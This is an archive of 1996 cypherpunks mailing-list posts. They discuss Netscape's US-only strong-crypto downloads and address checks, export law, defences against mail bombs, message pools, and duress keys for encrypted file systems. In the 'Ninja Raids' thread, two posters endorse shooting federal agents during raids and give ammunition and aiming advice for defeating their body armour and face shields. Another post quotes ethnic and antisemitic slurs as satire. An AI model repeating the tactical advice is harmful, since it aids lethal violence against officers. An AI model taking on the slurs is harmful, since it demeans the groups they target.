great for backup purposes.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 17:23:52 +0800
To: cypherpunks@toad.com
Subject: "address verification databases"? (was: Netscape download...)
Message-ID: <ae131e2d10021004c6c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 7/17/96, Jeff Weinstein wrote:

>  Because we have not yet been able to obtain the address verification
>databases that we need for Canada.  There is someone working on
>tracking this down right now.  When we get the proper database we
>will add access to canada.
>
>        --Jeff

Jeff, can you tell us anything more about what these "address verification
databases" are?

For example, are they derived from government sources? Census data? (Naw,
can't be, for at least two obvious reasons). Voting records? (Naw.) Credit
card purchases? (??)

While I can imagine various commercial firms have indicators that a "T.
Christopher May" once lived in Rio Del Mar (the name of a town I lived in,
though not an official "Postal Service" address), I really find it odd
that, for example, there would be any database that could "parse" the
informal information people provide (absent a well-defined set of addresses
and precise spellings).

In case I'm not making myself clear, there are no "official" addresses of
persons in the U.S! Not even the tax system requires registration of all
persons and specific addresses. This has come up in several "voter's
rights" cases, where persons with no fixed address were nevertheless able
to vote. If I, T.C. May, say my address is Moonbeam Trailer Park, who's to
say it's not? Maybe it's where I'm staying with a girlfriend, maybe it's
where I get my mail, maybe it's my spiritual home. And yet just which
"address verification database" could possibly confirm that I live in (or
get my mail at the Moonbeam Trailer Park at this exact moment? Absent any
laws clearly defining what one's official name is, official phone number
is, official zip code is, official address is, etc., just about anything we
choose to put down on the Web form is kosher.

At least the MIT system was based on ISP domain names, crude as this is,
and not on putative names and residential or business addresses.

Anyway, I don't know if Netscape is rejecting the information I'm providing
them, as I've been unable to get through in roughly 30 connect attempts.

But I'm still curious about what these "address verification databases."
Sounds ominous to me.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 18 Jul 1996 13:54:27 +0800
To: cypherpunks@toad.com
Subject: An interesting instance of poltical anonymnity, now revealed
Message-ID: <01I773CWDUC09ED9YD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I find the CBS News response unfortunate. There's also the simple
question on lying to maintain the identity: what's so bad about lying? Why
he revealed himself is somewhat of lesson also.
	-Allen

   _ Wednesday July 17 9:12 PM EDT _
   
'Primary Colors' Author Steps Forward

   NEW YORK (Reuter) - One of the best kept secrets in political,
   journalistic and publishing circles was revealed Wednesday when
   Newsweek journalist Joe Klein admitted he was ''Anonymous'', the
   mysterious author of a novel based on President Clinton's 1992
   presidential campaign.
   
[...]

   Klein, facing fellow journalists who had been speculating along with
   many politicians and readers about the identity of ''Anonymous'' since
   the book's publication in January, fended off questions about his
   credibility and about how he had lied when asked whether he wrote the
   book.
   
   ``It wasn't easy, but I felt that there are times when I too can lie
   to protect a source and I put this in that category. Other people may
   see this differently,'' said Klein.
   
[...]

   CBS News later said it was unhappy with Klein, who works for the
   network as a political consultant.
   
   ``We are obviously disturbed by the fact that Joe Klein was not
   forthcoming with us nor with nearly anyone else of his authorship of
   the novel 'Primary Colors,''' CBS News executive Vice President
   Jonathan Klein (no relation) said in a statement. He said network
   president Andrew Hayward would meet the author next week to discuss
   the matter.
   
[...]

   His announcement followed a report in Wednesday's Washington Post that
   handwritten changes to the manuscript appeared to match Klein's
   handwriting.
   
[...]   

  _Reuters Limited_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 18 Jul 1996 14:05:11 +0800
To: cypherpunks@toad.com
Subject: Reuters coverage of the Netscape release
Message-ID: <01I773KYX3W49ED9YD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Most people reading this are likely to wonder "how could overseas
Net surfers downloading it hurt anyone?", although some wil have their minds
go blank (or blanker than normal) at the mention of "terrorist groups." A
mixed set of news coverage, overall. As usual (even if I forget to state it),
edited to try to stay within fair use.
	-Allen

>   _ Wednesday July 17 6:52 AM EDT _
   
>Government Approves More Secure Netscape

>   MOUNTAIN VIEW, Calif. (Reuter) - Netscape Communications Corp. has
>   received government clearance to distribute a highly secure version of
>   its popular Navigator Web browser in the United States via the
>   Internet.
   
[...]

>   Officials had been concerned that if the more secure version was
>   available on the Net, overseas Net surfers -- possibly including
>   terrorist groups -- would download it, she said.
   
>   The software contains multiple formulas that make it virtually
>   impenetrable for computer hackers and others who might attempt to
>   break into Internet transmissions, steal credit card codes or tamper
>   with bank accounts.

[...]
   
>   ``This new ability ... means more people will have access to stronger
>   and more secure communications than ever before,'' Netscape co-founder
>   Marc Andreessen said in a statement.
   
>   ``This stronger security will help to accelerate the adoption of the
>   Internet as a medium for online communication and commerce,'' he
>   added.
   
[...]

>   _Reuters Limited_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 18 Jul 1996 15:34:02 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: Russian foreign intelligence CD-ROM
In-Reply-To: <v0151010eae12fe5de79b@[204.62.128.229]>
Message-ID: <199607180417.XAA09943@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Declan McCullagh wrote:
> 
>  LOOKING FOR A GREAT GIFT IDEA? The Russian Foreign Intelligence Service
>  (SVR) announced yesterday that it is releasing a six-hour long CD ROM that
>  tells the stirring 75-year history of Soviet and Russian foreign
>  intelligence. The CD ROM will be released in Russian and English versions
>  and sell for about $120. It promises to provide buyers with access to SVR
>  headquarters, and contains interviews with dozens of heretofore mysterious
>  intelligence officers described as having helped shape the existing world
>  order. (Itar-Tass, Interfax, July 16)
> 

Knowing KGB habits as pertaining to releasing information to the public,
I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and 
maybe 10% truth that was already publicly available.

It is like buying a CDROM about the history of the Net from Dr. Grubor.
Maybe it would be interesting and amusing, but not worth $120.

Would be nice if I was proven wrong though.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 17:05:24 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Defend Mail Bomb
Message-ID: <199607180615.XAA12443@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 7/14/96 +0800, you wrote:
>Is it possible to defend mail bomb? If not, detect who they are?

Mail bombs are hard to defend against.  If your company or ISP
has a firewall or mail server that handles their incoming email,
it can potentially be configured to block mail from known harassers,
but it's much harder to do if automatically - ten megabytes of binary
data might be mailbombs, or might be the CAD/CAM file that your
engineering department wanted.

If the mailbombs are all coming from one place, over a period of time,
you can often look at the headers and track down where they came from,
and contact the administrators of the machines the mail came from
to ask them to stop the problem.  But if the attacker is good,
this requires looking at large numbers of log-files, and many administrators
aren't willing to do this except for serious on-going problems.

If the mailbombs are coming from anonymous remailers, most remailer
operators are happy to put you on their block list, to block further
anonymous mailbombs.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 17:21:13 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <199607180615.XAA12448@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>receive message pools by satellite dish-- hurray for true broadcasting!  

tcmay@got.net (Timothy C. May) wrote:
>Yeah, and I should have mentioned the "PageSat" Usenet distribution model,
>too. (It was a really hot topic 3-4 years ago, but I've heard little of it
>in the past couple of years...the rise of the Web has made passive
>downloads of Usenet a lot less interesting.)

Volume has been a real problem.  Usenet is probably close to 10MB/hour
these days, which is 30 kbps if you don't compress it, or 10-15 kbps
compressed (since the binary newsgroups are a good chunk of the volume
and are already mostly compressed.)  That's pushing what you can do with
really-low-end satellites, and as Tim says, the Web has affected the
size of the market for that kind of service.  

I don't know how easy it is to get one of these pseudonymously, and they
do cost a bit, but an amusing transmission medium for message pools is
alphanumeric pagers; you can get pager cards for PCs, or just limit
your messages to 250-byte blocks....  Bay Area alphanumeric service
probably costs $25/month, though nationwide is $60-100.

>2. The authorities already have identified a suspect, call him "Bob," and
>wish to know if he reading (and perhaps decrypting) messages to "Alice."
>
>As several of us have noted, #1 is tough--real tough. The authorities would
>have to contact 10,000 or more ISPs who have local newsfeeds and subpoena
>their logs of who read which newsgroups...assuming such logs are even kept

Getting everybody is tough.  Getting a lot of the potential suspects,
however, isn't as tough as it looks - the vast majority of home Internet
users are on AOL, Compuserve, Prodigy, UUNet, Netcom, or (RSN) AT&T.
Anonymous Message Pool users are a bit more likely to use niche-market ISPs,
especially under pseudonyms, but if the number of users increases 
significantly there'll still be a reasonable proportion on the big carriers,
which are probably more cooperative and probably keep more complete logs.

On the other hand, several of the big players are good places to get 
disposable accounts charged to that secured Visa debit card you
opened under a pseudonym....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 18 Jul 1996 14:03:22 +0800
To: cypherpunks@toad.com
Subject: Telecom regulations - Reuters coverage
Message-ID: <01I773SHGH6G9ED9YD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Of course, the Demopublicans want to subsidize access for their voters.
Those already on the net have a considerably higher likelihood, so far as I can
tell, of being Independents or Libertarians. The bad guys naturally want to
bring it in line with their domination.
	-Allen

>   _ Tuesday July 16 1:52 PM EDT _
   
>FCC Chairman Hundt Sees Tax On Telecom Industry

>   FAJARDO, Puerto Rico - A small tax will probably be imposed on
>   telecommunications companies' revenues to subsidize telephone access
>   in rural areas and help wire classrooms for the Internet, Federal
>   Communications Commission Chairman Reed Hundt told the nation's
>   governors.

[...]

>   But ensuring that residents in sparsely populated areas have access at
>   affordable rates and meeting the administration's goal of wiring every
>   classroom in the nation for Internet access will require annual
>   subsidies of about $10 billion, Hundt said.
   
>   &quot;The current subsidy system won't work and has to be totally
>   overhauled,&quot; he said.
   
>   Asked how that money would be raised, Hundt said, &quot;Probably the
>   right way to go is, based on total revenues, throw a chunk of change
>   into the pot.&quot;
   
>   He said the levy would be &quot;competitively neutral&quot; and would
>   represent a small percentage of revenues for the telecommunications
>   industry, whose annual gross revenues are about $250 billion.
   
[...]

>  Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 18 Jul 1996 19:38:35 +0800
To: cypherpunks@toad.com
Subject: US govt claims to want to combat "computer terrorism"
Message-ID: <01I7742PEB009ED9YD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Somehow, I suspect that their efforts will A: not include any non-GAKed
cryptography involvement, and probably minimal GAKed cryptography - less chance
of someone using superencryption in a hard-to-detect fashion. I also suspect
that they'll be cutting down on anonymnity, or at least trying to. Notice the
link to an almost completely unrelated incident, namely the Oklahoma City
bombing.
	-Allen

>   _ Wednesday July 17 1:28 PM EDT _
   
>U.S. urges &quot;Manhattan Project&quot; for cyber security

>   WASHINGTON - The Clinton administration is urged U.S. industry to join
>   in a sweeping new drive to protect computer networks and other modern
>   lifelines from attack by terrorists and others.
   
[... Jamie Gorelick, or whatever her name is (yes, the pro-GAKing one), said:]

>   &quot;What we need, then, is the equivalent of the 'Manhattan Project'
>   for infrastructure protection, a cooperative venture between the
>   government and private sector to put our best minds together to come
>   up with workable solutions to one of our most difficult
>   challenges,&quot; she told the Governmental Affairs permanent
>   subcommittee on investigations.
   
>   President Clinton set the stage for such a blitz Monday with an
>   executive order setting up a blue-ribbon panel that will recommend
>   measures to safeguard such lifelines as telecommunications, power
>   systems, water supply, and gas and oil storage and transportation. The
>   panel is to be chaired by a presidential appointee drawn from the
>   private sector and will include representatives from government and
>   industry.

[...]
   
>   The administration began to focus on the issue after the April 19,
>   1995, bombing that killed 168 people in an Oklahoma City federal
>   office building.
   
>   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 18 Jul 1996 17:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
Message-ID: <199607180630.XAA29062@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:30 PM 7/16/96 -0700, Jim Gillogly wrote:
>"Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
>>A problem with a c'punk-style encrypted fs with source code and wide 
>>distribution is, of course, that attackers will KNOW that there is a 
>>duress key.
>
>Good point.  This suggests a design desideratum for any such system should
>be that the user may choose not to have a duress key, maintaining
>semi-plausible deniability for those who choose to have one.

Perhaps a user settable number of duress keys with different behavior for
each of them?


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 18:07:19 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Lying Purebred Sovok Tchurkas Write the History of the Net
Message-ID: <ae13272612021004e248@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:17 AM 7/18/96, Igor Chudov @ home wrote:

>Knowing KGB habits as pertaining to releasing information to the public,
>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and
>maybe 10% truth that was already publicly available.
>
>It is like buying a CDROM about the history of the Net from Dr. Grubor.
>Maybe it would be interesting and amusing, but not worth $120.

NOW you tell me! I just shelled out $42 for "The History of the Net," by
Dr. John Grubor and Dr. Dmitri Vulis, 1996.

And here I thought it was the real history of the Net, especially the part
about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
cripples dying of AIDS in Sovok-controlled clinics."

When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot,
I thought this was the actual truth. I guess not. Maybe Spafford is
actually Rabbi Ruthenberg.

--Tim May

(hint: this a satire, based on the writings of Vulis, who speaks of people
as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the
charming word "(spit)" after nearly every person he references.)


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 18 Jul 1996 20:10:25 +0800
To: cypherpunks@toad.com
Subject: Hettinga Rants in WiReD...
Message-ID: <v03007605ae1361ea0c20@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Now if they'll send me the check... :-)

About two months ago, I wrote an 'Idees Fortes' piece for Wired. It's about
digital bearer bonds. If I remember the title, it's something like "The
Internet as Buttonwood Tree". You guys have heard most of it from me
before. Thus, as usual, it is, again, TiReD...

People tell me it's in the latest issue, which is out now, but I haven't
gone looking for it on the newstand yet. Maybe they'll send me a clipping.
With the check. Did I tell you they haven't sent the check. That's a
recurring problem with me lately... Maybe I should update my
non-repudiation rant...

You shoulda seen the first version. Or, maybe you did... I can't remember.
The editor said something about it being too out there, or something like
that.  For WiReD?... ;-)

It's late. I'm going to sleep.


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Thu, 18 Jul 1996 11:27:49 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <m0ugeds-0000AyC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin <froomkin@law.miami.edu> writes:

>> So, who is in this "emerging consensus"?
>Foreign governments?  

The recent issue of the German law journal NJW-CoR contains a
report on the "ICC/BIAC/OECD Business Government Forum
on Global Cryptography" in Washington, D.C., 1996-05-07.

The author claims that the commerce representatives at the
conference said they understood that governments had legitimate
interest in key escrow and that key escrow could have commercial
benefits.

The Japanese government delegation stated that they were shocked
about the American and European plans, because the Japanse
Constitution prohibits mandatory key esrow.

OECD will decide on crypto policy guilelines early in 1997.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jul 1996 20:49:30 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Opiated file systems
Message-ID: <199607180708.AAA09887@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 PM 7/17/96 +0000, Deranged Mutant wrote:

>1. Confiscate computer (along with physical drive) with duress-capable
>encrypted file system; 2. back up the encrypted sectors; 3. reverse-engineer file 
>system driver to figure out how the duress-key works, if there are 
>multiple keys, where data is stored; 4. make sure you've rubber-hosed 
>or subpeoned all passphrases or keys; 4a. if the system destroys data, 
>you've got backups ("Very funny kiddo; now give us the real key...")
>4b. even if there are two filesystems, the attacker will want access 
>to both, just to make sure...

It has long occurred to me, considering the size and low power of the 
typical 3.5" hard drive compared with the size of the typical house or 
apartment, that it might be an interesting project to remotely connect such 
a (hidden) drive to your computer using a reasonably surreptious link that 
is difficult to trace.  Say, an IR optical link, a single bare (unjacketed) 
optical fiber, a LAN with hidden nodes, or a similar system.  Maybe an 
inductive pickup.  In any raid, they'll have to decide what to take, and 
chances are very good that they won't find every hidden item.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Thu, 18 Jul 1996 18:04:20 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto 96
In-Reply-To: <199607172345.QAA08995@jobe.shell.portal.com>
Message-ID: <4sknsp$cge@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199607172345.QAA08995@jobe.shell.portal.com>,
Hal  <hfinney@shell.portal.com> wrote:
> Crypto 96 is coming up in about a month.

Yeah, should be good fun -- see you there!

I just wanted to point out that many of the papers you mentioned
below are available on the Web, if you want to preview them.

(Please excuse me if any of the URLs are wrong-- I'm logged in
via a slowish link, so I've just copied the URLs from my bookmarks
without checking them.)

> Anonymous Communication and Anonymous Cash
>    Daniel Simon, Microsoft, USA

http://pct.microsoft.com/research.html
I think?

> The Dark Side of 'Black-Box' Cryptography, or: Why Should We Trust Capstone?
>    Adam Young, Columbia Univ., USA
>    Moti Yung, IBM, USA

http://www.cs.columbia.edu:80/~ayoung/
and discussed on sci.crypt and sci.crypt.research.

> Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and
> Other Systems
>    Paul Kocher, Stanford, USA

http://www.cryptography.com/
for an early draft.

> Key-Schedule Cryptanalysis of IDEA, G-DES, GOST, SAFER, and Triple-DES
>    John Kelsey, Counterpane Systems, USA
>    Bruce Schneier, Counterpane Systems, USA
>    David Wagner, Univ. California at Berkeley, USA

http://www.cs.berkeley.edu/~daw/me.html
I wouldn't call it a ``big new result''; it talks about
differential related-key attacks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 18 Jul 1996 21:04:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "address verification databases"? (was: Netscape download...)
In-Reply-To: <ae131e2d10021004c6c1@[205.199.118.202]>
Message-ID: <31EDEC0A.7206@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 9:45 PM 7/17/96, Jeff Weinstein wrote:
> 
> >  Because we have not yet been able to obtain the address verification
> >databases that we need for Canada.  There is someone working on
> >tracking this down right now.  When we get the proper database we
> >will add access to canada.
> >
> >        --Jeff
> 
> Jeff, can you tell us anything more about what these "address verification
> databases" are?
> 
> For example, are they derived from government sources? Census data? (Naw,
> can't be, for at least two obvious reasons). Voting records? (Naw.) Credit
> card purchases? (??)

  Our database was obtained from American Business Information.
They make those CDROMs with 11 million business names and addresses,
and other such products.  There is a link to their web page from our
US download page.

> While I can imagine various commercial firms have indicators that a "T.
> Christopher May" once lived in Rio Del Mar (the name of a town I lived in,
> though not an official "Postal Service" address), I really find it odd
> that, for example, there would be any database that could "parse" the
> informal information people provide (absent a well-defined set of addresses
> and precise spellings).
> 
> In case I'm not making myself clear, there are no "official" addresses of
> persons in the U.S! Not even the tax system requires registration of all
> persons and specific addresses. This has come up in several "voter's
> rights" cases, where persons with no fixed address were nevertheless able
> to vote. If I, T.C. May, say my address is Moonbeam Trailer Park, who's to
> say it's not? Maybe it's where I'm staying with a girlfriend, maybe it's
> where I get my mail, maybe it's my spiritual home. And yet just which
> "address verification database" could possibly confirm that I live in (or
> get my mail at the Moonbeam Trailer Park at this exact moment? Absent any
> laws clearly defining what one's official name is, official phone number
> is, official zip code is, official address is, etc., just about anything we
> choose to put down on the Web form is kosher.

  Our verification software does not check that the person whose name
is entered in the form lives at the address entered in the form.
We do verify some parts of the information entered.  Things like
is the state code one of the 50 states, does the zip code match
the state, etc.  (NOTE - these may not be the exact checks implemented
currently.  I have not examined the code myself, but these are the
types of checks being done.)

> At least the MIT system was based on ISP domain names, crude as this is,
> and not on putative names and residential or business addresses.

  We also screen out based on domain names.

> Anyway, I don't know if Netscape is rejecting the information I'm providing
> them, as I've been unable to get through in roughly 30 connect attempts.

  We will be increasing capacity soon.  The demand is very high.  It
costs
us real dollars to buy hardware and T3 lines to allow people to download
the software for free.

> But I'm still curious about what these "address verification databases."
> Sounds ominous to me.

  I'm sorry that my choice of words disturbed you.  I hope my
explanation
will allay at least some of your fears.  There are many people here
(including Jim Barksdale) who are very concerned about maintaining
personal privacy.  Certainly if we could we would make the US versions
of our software available in the same way that we currently make
the export versions available.  At least people now have the choice
of obtaining the US version over the internet.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 18 Jul 1996 17:34:00 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007605ae11ca8d04d9@[192.187.162.15]>
Message-ID: <Pine.LNX.3.93.960718004854.836A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jul 1996, David Sternlight wrote:
> At 3:36 AM -0700 7/16/96, Duncan Frissell wrote:
> >At 04:18 PM 7/15/96 -0700, sameer wrote:
> >>	Not like that's tough to figure out. Congrats. It's cool to
> >>actually be able to connect to my webserver using real encryption.
> >>Glad the lawyers don't think Barksdale is going to jail anymore.
> >I'm glad too.  So how many minutes did it take to leak overseas?
> It doesn't "leak overseas" as if there were some regrettable lapse in the
> plumbing. Someone has to commit a felony violation of Federal law.

     No they don't. If they are French, Russian, English, Greek, etc. They
 _may_ be violating their countries laws, but they are not necessarily 
violating ours. 

    

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Myers <blackavr@aa.net>
Date: Thu, 18 Jul 1996 18:47:18 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960718081151.0070f490@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 7/17/96 -0700, Timothy C. May wrote:


>a lot of trouble for calling for "head shots" on rampaging BATFags.
>Frankly, I'm not a good enough shot--especially in high-stress
>situations--to make head shots with my H & K .45, so I can only hope to
>make torso shots.)

Gotta spend more time at the range...*grin*


>Personally, I think all folks should be armed at all times in their homes.
>Those who aren't are taking their chances. My personal choice is a Heckler
>& Koch USP .45. loaded with Federal Golden Sabres, a hollowpoint round that
>has a 92% one-shot stop rate, with adequate penetration through Kevlar
>vests (typically worn by BATF raiders). I may die, but I hope I can take at

Just as a technical aside, the "entry" vests are becoming much more common,
and can often stop up to 7.62 NATO, sometimes even .30-06 AP rounds. The
handgun rounds don't even faze wearers of this vest. They'd be likely to go
through the Lexan face shields, though (hint hint...Mozambique drill).

>least two of them with me. (Interestingly, the same class of folks who want
>to ban "military-grade crypto" are also seeking to ban Kevlar vest-piercing
>rounds.

Same bunch are also working to ban civilian ownership of bullet-resistant
vests...seems like a pattern developing here, doesn't it?
--
/^^^^^^^^^Instead of being born again, why not just GROW UP?^^^^^^^^^^^\
Michael Myers                   Vote Libertarian....you'll sleep better!
Don't like abortion? Don't have one.     Don't like guns? Don't buy one.
blackavr@aa.net                          E-mail for PGPv2.6.2 public key
\____________ http://www.aa.net/~blackavr/homepage.htm ________________/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 20:14:44 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <v03007605ae11ca8d04d9@[192.187.162.15]>
Message-ID: <v03007600ae13ace3cf64@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 PM -0700 7/17/96, snow wrote:
>On Tue, 16 Jul 1996, David Sternlight wrote:
>> At 3:36 AM -0700 7/16/96, Duncan Frissell wrote:
>> >At 04:18 PM 7/15/96 -0700, sameer wrote:
>> >>	Not like that's tough to figure out. Congrats. It's cool to
>> >>actually be able to connect to my webserver using real encryption.
>> >>Glad the lawyers don't think Barksdale is going to jail anymore.
>> >I'm glad too.  So how many minutes did it take to leak overseas?
>> It doesn't "leak overseas" as if there were some regrettable lapse in the
>> plumbing. Someone has to commit a felony violation of Federal law.
>
>     No they don't. If they are French, Russian, English, Greek, etc. They
> _may_ be violating their countries laws, but they are not necessarily
>violating ours.

That is only true if they find a way to crack Netscape's software
distribution security from overseas, or somehow found a user machine with
the software on it and cracked IT. IF the thing leaks it is much more
likely because someone on our side of the border was complicit.

Do I _think_ it will stay on this side of the border? Of course not. But
any leaked copies will be illicit and won't be in the "mass" market of
non-US Netscape versions. I think the government realizes this and the
safeguards are designed to deal with the mass of overseas users, not the
odd clever hacker and his friends.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 18 Jul 1996 13:34:45 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Opiated file systems
In-Reply-To: <199607171103.MAA00222@server.test.net>
Message-ID: <Pine.LNX.3.94.960718015546.9976B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 17 Jul 1996, Adam Back wrote:

> Date: Wed, 17 Jul 1996 12:03:46 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> To: jpb@miamisci.org
> Cc: maldrich@grci.com, deviant@pooh-corner.com, WlkngOwl@unix.asb.com,
>     cypherpunks@toad.com, aba@dcs.ex.ac.uk
> Subject: Re: Opiated file systems
> 
> 
> Joseph Block <jpb@miamisci.org> writes:
> > At 10:44 AM -0400 7/16/96, Mark O. Aldrich wrote:
> > >One problem, however, would be how to keep the "decoy" data, accessible
> > >with only the ambush key, "fresh" in that it must undergo a certain amount
> > >of turbulence to appear real.
> 
> A problem yes.  My thoughts were that you would effectively have two
> filesystems and use them both yourself for real work.  That is to say
> that you would say have some consulting work doing some programming or
> something, and use the 1st encrypted filesystem for this work.  If
> this work was covered by an NDA, so much the better, as it would
> provide an understandable reason for encrypting.

Good Idea, but I also like the idea of selective-duress, i.e. not
necisarily having a duress key at all.

> 
> > >The two file systems would essentially have to
> > >mirror each other, one with the juicy bits and one with the decoy bits.
> > >It would seem to be practically impossible to just build two file systems
> > >as one would 'disappear' when only the ambush key was used.  Wouldn't it
> > >be sort of obvious that something was wrong if half the disk vanished?
> 
> I don't think nuking the data is the way to go, from what I understand
> of the way these things work, is that they kick down the door in the
